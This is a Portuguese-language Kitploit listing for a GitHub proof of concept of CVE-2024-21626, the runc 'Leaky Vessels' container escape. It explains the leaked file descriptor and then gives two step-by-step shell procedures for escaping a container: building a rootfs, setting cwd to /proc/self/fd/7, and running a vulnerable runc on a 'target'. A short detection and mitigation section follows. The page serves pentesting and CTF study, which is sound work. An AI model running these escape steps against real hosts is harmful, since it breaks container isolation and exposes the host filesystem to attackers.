Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cve-2024-21626-runc-1.1.11-escape — PoC para CVE-2024-21626: runc vaza um fd interno referenciando o CWD do host antes do pivot_root, permitindo a fuga do contêiner ao definir process.cwd para /proc/self/fd/7 | Kitploit
Ferramentas/GitHubGitHub/strikoder-premium/cve-2024-21626-runc-1.1.11-escape
Segurança de ContêineresAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoRed TeamingEscape de Contêiner
GitHubstrikoder-premium/cve-2024-21626-runc-1.1.11-escape

cve-2024-21626-runc-1.1.11-escape

PoC para CVE-2024-21626: runc vaza um fd interno referenciando o CWD do host antes do pivot_root, permitindo a fuga do contêiner ao definir process.cwd para /proc/self/fd/7

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
18há 6 mesesAinda não revisado

CVE-2024-21626 - runc Vasos com Vazamento

Visão Geral

CampoDetalhe
CVECVE-2024-21626
Componente Afetadorunc ≤ 1.1.11
Classe de VulnerabilidadeFuga de contêiner via vazamento de descritor de arquivo
ApelidoVasos com Vazamento

Causa Raiz

O runc vaza um descritor de arquivo interno (tipicamente fd/7) apontando para o diretório de trabalho do sistema de arquivos do host antes de executar o processo do contêiner. Ao definir o cwd do contêiner em config.json para /proc/self/fd/7, o processo cai em um diretório do host em vez do rootfs do contêiner — obtendo uma fuga de contêiner.


Métodos de Exploração

Método 1 - Rootfs manual a partir de binários do host

Construa um rootfs mínimo copiando binários diretamente do host:

root@kitploit:~
# 1. Create directory structure
cd /tmp && mkdir -p strikoder/rootfs && cd strikoder
mkdir -p rootfs/lib64 rootfs/lib

# 2. Copy binaries and required libraries
cp -aL /bin rootfs/bin
cp /lib64/ld-linux-x86-64.so.2 rootfs/lib64/
cp -a /lib/x86_64-linux-gnu rootfs/lib

# 3. Generate default OCI config
runc spec

# 4. Patch cwd in config.json to point at leaked host fd
# Change: "cwd": "/"
# To:     "cwd": "/proc/self/fd/7"
vi config.json

# 5. Run the container with the vulnerable runc binary
sudo /opt/debug --log /tmp/log.json run strikontainer

O que acontece: O runc abre fd/7 referenciando o CWD do host antes de fazer o pivô para o rootfs do contêiner. Definir cwd para /proc/self/fd/7 faz com que o runc execute chdir() para o caminho do host em vez do contêiner — colocando você no sistema de arquivos real.


Método 2 - Imagem Docker Alpine como rootfs

Se você precisar de um ambiente mais completo ou o host tiver binários limitados:

root@kitploit:~
# --- On your attack machine ---
# Export a minimal Alpine filesystem
docker export $(docker create alpine:latest) > alpine.tar

# Transfer alpine.tar to the target, then:

# --- On target ---
mkdir -p /tmp/strikoder/rootfs && cd /tmp/strikoder
tar -xvf /path/to/alpine.tar -C rootfs

# Generate OCI bundle config
runc spec

# Patch cwd (same as Method 1)
vi config.json
# "cwd": "/proc/self/fd/7"

# Run
sudo /opt/debug --log /tmp/log.json run strikontainer

Detecção e Mitigação

  • Correção: Atualize o runc para ≥ 1.1.12 (ou ≥ 1.2.0-rc.2)
  • Detectar: Monitore openat() em /proc/self/fd/ dentro das configurações de cwd do contêiner; alerte sobre bundles OCI com cwd contendo /proc/self/fd
  • Mitigar: Use perfis seccomp que restrinjam o acesso a /proc; considere contêineres sem root ou gVisor/Kata para isolamento mais forte

Referências

  • NVD: CVE-2024-21626
  • Aviso de Segurança do GitHub do runc
  • Blog Snyk sobre Vasos com Vazamento
  • HackTheBox - máquina GiveBack
Baixar ferramenta